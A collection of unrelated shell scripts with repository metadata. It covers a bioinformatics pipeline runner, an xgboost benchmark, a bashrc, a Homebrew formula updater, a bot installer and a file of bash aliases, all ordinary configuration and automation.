parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_baylogbf/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_126features.pkl"
braw_pll_path="false"
braw_cd_path=" false "
mat_baypost_path=" false "
mat_logbayfac_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/bayesian_3comp_pLL/logbf/ "
run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + pLL + CD
#-------------------------------------------------------------------------------
#method_name="pLL-cd-RF"
#parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_l2normapc_cd/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_126features.pkl"
#braw_pll_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpred-pll-centerv/braw/ "
#braw_cd_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpredpy_cd_gd/braw/ "
#mat_baypost_path=" false "
#mat_logbayfac_path=" false "
#run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + pLL + CD + Bayesian Posterior
#-------------------------------------------------------------------------------
method_name="pLL-cd-bayPost-RF"
parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_l2normapc_cd_baypost/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_177features.pkl"
braw_pll_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpred-pll-centerv/braw/ "
braw_cd_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpredpy_cd_gd/braw/ "
mat_baypost_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/bayesian_3comp_pLL/posterior/"
mat_logbayfac_path=" false "
run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
#-------------------------------------------------------------------------------
# RF + pLL + CD + Bayesian likelihood (log BF)
#-------------------------------------------------------------------------------
method_name="pLL-cd-logBF-RF"
parameter_path="/usr/users/svorber/work/data/bayesian_framework/contact_prior/random_forest/new_pipeline_5folds/random_forest/classweightNone_noncontactthr8_l2normapc_cd_baylogbf/100000contacts_500000noncontacts_5window_8noncontactthreshold_maxfeatures030/random_forest_nestimators1000_maxfeatures0.3_maxdepth100_minsamplesleaf10_127features.pkl"
braw_pll_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpred-pll-centerv/braw/ "
braw_cd_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/ccmpredpy_cd_gd/braw/ "
mat_baypost_path=" false "
mat_logbayfac_path=" /usr/users/svorber/work/data/benchmarkset_cathV4.1/contact_prediction/bayesian_3comp_pLL/logbf/"
run_update_script $method_name $parameter_path $braw_pll_path $braw_cd_path $mat_baypost_path $mat_logbayfac_path $CONTACT_PREDICTION_PATH
| true |
1e2d90152effa13f9453c308685d12cc8d18f922 | Shell | DSC-SPIDAL/harpgbdt | /run/12.LossGuide/test/run-convergence-block-depthwise.sh | UTF-8 | 1,075 | 3.125 | 3 | [] | no_license | #!/bin/bash
bin=$1
if [ -z $bin ] ; then
bin=../bin/xgboost-g++-omp-dense-halftrick-short-splitonnode-lossguide-release
fi
tagname=`basename $bin`
if [ ! -f $bin ]; then
echo "Usage: run-convergence.sh <bin>"
echo "$bin not exist, quit"
exit -1
fi
echo "run scaling test with tagname=$tagname"
export RUNID=`date +%m%d%H%M%S`
../bin/xgb-convergence.sh ${bin} higgs 1000 8 lossguide 32 500000 1 0 65536
#../bin/xgb-convergence.sh ${bin} higgs 1000 12 lossguide 32 500000 1 0 65536
#../bin/xgb-convergence.sh ${bin} higgs 1000 16 lossguide 32 500000 1 0 65536
echo "================================"
echo " Convergence Test Results:"
echo "================================"
echo -e "binname\trunid\ttrainingtime"
#find . -name "Convergence*${tagname}*.csv" -exec cat {} \; |gawk -F, '{printf("%s\t%s\t%s\t%s\n",$1,$2,$3,$6)}' |sort
echo "ls -tr */Convergence*${tagname}*${RUNID}.csv | xargs cat |gawk -F, '{printf("%s\t%s\t%s\t%s\n",$1,$2,$3,$6)}'"
ls -tr */Convergence*${tagname}*${RUNID}.csv | xargs cat |gawk -F, '{printf("%s\t%s\t%s\t%s\n",$1,$2,$3,$6)}'
| true |
91d669a93e23dc5f345cb5caffcdc2fd5a85c896 | Shell | hoshi-no-sora/memo | /Bash/set_command.sh | UTF-8 | 202 | 3.328125 | 3 | [] | no_license | #!/bin/bash
function echo_runlevel() {
set $(/sbin/runlevel)
local previous=$1
local runlevel=$2
echo "previous runlevel was $previous"
echo "current runlevel is $runlevel"
}
echo_runlevel
| true |
18d8d877ccbf4700950e25d49338f038ba67a443 | Shell | sistematico/majestic | /root/.bashrc | UTF-8 | 1,267 | 3.015625 | 3 | [] | no_license | #
# ~/.bashrc
#
##################
##### History ###
##################
# Avoid duplicates
export HISTCONTROL=ignoredups:erasedups
# Size
export HISTSIZE=10000
export HISTFILESIZE=10000
##################
##### Aliases ####
##################
if [[ -f ~/.bash_aliases ]]; then
source ~/.bash_aliases
fi
##################
##### Sources ####
##################
if [[ -f /etc/cores.inc ]]; then
source /etc/cores.inc
fi
if [[ -f /usr/share/doc/pkgfile/command-not-found.bash ]]; then
source /usr/share/doc/pkgfile/command-not-found.bash
fi
if [[ -f /usr/share/git/completion/git-prompt.sh ]]; then
source /usr/share/git/completion/git-prompt.sh
fi
# # Use bash-completion, if available
if [[ $PS1 && -f /usr/share/bash-completion/bash_completion ]]; then
source /usr/share/bash-completion/bash_completion
fi
if [ -f /usr/share/bash-completion/completions/dkms ]; then
source /usr/share/bash-completion/completions/dkms
fi
##################
##### Funções ####
##################
if [[ -f ~/.bash_functions ]]; then
source ~/.bash_functions
fi
##################
##### Prompt #####
##################
PS1="\[${Red}\][\[${Color_Off}\]\u@\h \W\[${Red}\]]\[${Color_Off}\]:\$ "
[ -f ~/.fzf.bash ] && source ~/.fzf.bash
fortune chucknorris
echo
| true |
e89192a188060b691aa3966c3e9e033838e3fd36 | Shell | scarton/TextClean | /scripts/step4.sh | UTF-8 | 468 | 2.640625 | 3 | [] | no_license | #!/bin/bash
###############
# Step 4: Second time, Performs regex cleanups on files, writing the output files to a target directory.
###############
echo "Step 4: 2nd Regex File Cleanup"
source ./classpath.sh
cd ..
mvn -DskipTests clean package
#echo "$(cygpath -pw "$CLASSPATH")"
java -Xmx10g -Dfile.encoding=UTF-8 -classpath "$(cygpath -pw "$CLASSPATH")" cobra.textclean.batch.RegexFiles \
H:/data/Enron/output/sentences \
H:/data/Enron/output/regex2
| true |
c22a46744af928bdc0d0489083679da966c9335d | Shell | borkdude/homebrew-brew | /update-carve | UTF-8 | 476 | 3.09375 | 3 | [] | no_license | #!/usr/bin/env /bin/bash
# Regenerate the Homebrew formula for carve from carve.template.
# Requires: curl, jq, sha256sum, and the two release zips in the working dir.

# Abort on any failure so a bad download or parse cannot emit a broken carve.rb.
set -euo pipefail

# Latest tag, e.g. "v0.4.0"; --fail makes curl return non-zero on HTTP errors.
tag=$(curl --silent --fail "https://api.github.com/repos/borkdude/carve/tags" | jq -r '.[0].name')
# Strip the leading "v" (safer than ${tag:1}, which would eat the first digit
# if a tag ever lacked the "v" prefix).
version=${tag#v}
linux="carve-$version-linux-amd64.zip"
macos="carve-$version-macos-amd64.zip"

# The release archives must already be present next to this script.
[ -f "$linux" ] && [ -f "$macos" ] || { echo "missing $linux or $macos" >&2; exit 1; }

linux_sha=$(sha256sum "$linux" | cut -f 1 -d " ")
macos_sha=$(sha256sum "$macos" | cut -f 1 -d " ")

# Fill in the template placeholders and write the formula.
sed -e "s/\${i}/1/" -e "s/\${VERSION}/$version/g" \
    -e "s/\${LINUX_SHA}/$linux_sha/g" \
    -e "s/\${MACOS_SHA}/$macos_sha/g" \
    carve.template > carve.rb
16d8bd6e28065dd7df2692e53c64187fd7dc4454 | Shell | NTUwanderer/NASA_Final | /server/extract_groups.sh | UTF-8 | 160 | 3.046875 | 3 | [] | no_license | #!/bin/bash
# Print the group names listed at the end of a user-list file ($1).
# Line 4 of the file holds the number of trailing group entries; each trailing
# line looks like "<id> <name> ..." and we emit the second space-separated field.
num=$(sed '4q;d' "$1")
# Read line-by-line instead of word-splitting $(tail ...): quoting "$num"/"$1"
# survives whitespace in the filename, and `read -r` avoids the accidental
# pathname (glob) expansion that `for entry in $(...)` performed on each line.
tail -n "$num" "$1" | while IFS= read -r entry; do
	printf '%s\n' "$entry" | cut -f2 -d' '
done
| true |
272f4069b2ba8c91facf47bf9cf9c36ff9de6217 | Shell | Fcatme/qinglong | /shell/bot.sh | UTF-8 | 1,322 | 3.6875 | 4 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bash
# Choose the bot repository: a user-supplied URL (BotRepoUrl) is cloned into
# "diybot", otherwise the default upstream repo goes into "dockerbot".
# NOTE(review): dir_repo/dir_data/dir_config/dir_log and the helpers
# git_clone_scripts/make_dir are presumably defined by the sourcing
# environment (qinglong shell framework) — confirm before running standalone.
if [[ -z ${BotRepoUrl} ]]; then
url="https://github.com/SuMaiKaDe/bot.git"
repo_path="${dir_repo}/dockerbot"
else
url=${BotRepoUrl}
repo_path="${dir_repo}/diybot"
fi
# Step 1: install the native build dependencies via Alpine's apk.
echo -e "\n1、安装bot依赖...\n"
apk --no-cache add -f zlib-dev gcc jpeg-dev python3-dev musl-dev freetype-dev
echo -e "\nbot依赖安装成功...\n"
# Step 2: fetch the bot sources (clone only if no git checkout exists yet)
# and copy the code plus a default config into place.
echo -e "2、下载bot所需文件...\n"
if [[ ! -d ${repo_path}/.git ]]; then
rm -rf ${repo_path}
git_clone_scripts ${url} ${repo_path} "main"
fi
cp -rf "$repo_path/jbot" $dir_data
# Keep an existing bot.json; only seed the default config on first install.
if [[ ! -f "$dir_config/bot.json" ]]; then
cp -f "$repo_path/config/bot.json" "$dir_config"
fi
echo -e "\nbot文件下载成功...\n"
# Step 3: install python dependencies, optionally through a pip mirror,
# skipping packages that `pip3 show` reports as already installed.
echo -e "3、安装python3依赖...\n"
if [[ $PipMirror ]]; then
pip3 config set global.index-url $PipMirror
fi
cp -f "$repo_path/jbot/requirements.txt" "$dir_data"
cd $dir_data
cat requirements.txt | while read LREAD; do
if [[ ! $(pip3 show "${LREAD%%=*}" 2>/dev/null) ]]; then
pip3 --default-timeout=100 install ${LREAD}
fi
done
echo -e "\npython3依赖安装成功...\n"
# Step 4: kill any running bot instance, then relaunch it detached with its
# output logged under $dir_log/bot.
echo -e "4、启动bot程序...\n"
make_dir $dir_log/bot
cd $dir_data
ps -eo pid,command | grep "python3 -m jbot" | grep -v grep | awk '{print $1}' | xargs kill -9 2>/dev/null
nohup python3 -m jbot >$dir_log/bot/nohup.log 2>&1 &
echo -e "bot启动成功...\n"
4ddb4a46d34b18373acc29194291845ffbe25340 | Shell | unusedPhD/bash-it | /aliases/available/custom.aliases.bash | UTF-8 | 1,396 | 2.859375 | 3 | [] | no_license | alias fucking=sudo
alias h='history | grep $1'
# common mispelled commands
alias xs='cd'
alias vf='cd'
alias got='git'
alias get='git'
alias gti='git'
alias claer="clear"
alias clera="clear"
alias celar="clear"
alias findgrep='grepfind'
alias mann='man'
alias updtae='update'
alias vmi='vim'
# git
alias gh='git hist'
alias gs='git status'
# tmux
alias tmux='tmux -2'
# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto --group-directories-first'
alias dir='dir --color=auto'
alias vdir='vdir --color=auto'
alias grep='grep --color=auto'
alias fgrep='fgrep --color=auto'
alias egrep='egrep --color=auto'
fi
# advanced ls functions
alias l='ls -l'
alias la='ls -la'
alias ll='ls -haltr'
alias lx='ls -lXB' # sort by extension
alias lk='ls -lSr' # sort by size, biggest last
alias lc='ls -ltcr' # sort by and show change time, most recent last
alias lu='ls -ltur' # sort by and show access time, most recent last
alias lt='ls -ltr' # sort by date, most recent last
alias lm='ls -al | more' # pipe through 'more'
alias lr='ls -lR' # recursive ls
alias tree='tree -Csu' # nice alternative to 'recursive ls'
[ -f ~/.config/fzf/bash ] && source ~/.config/fzf/bash
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.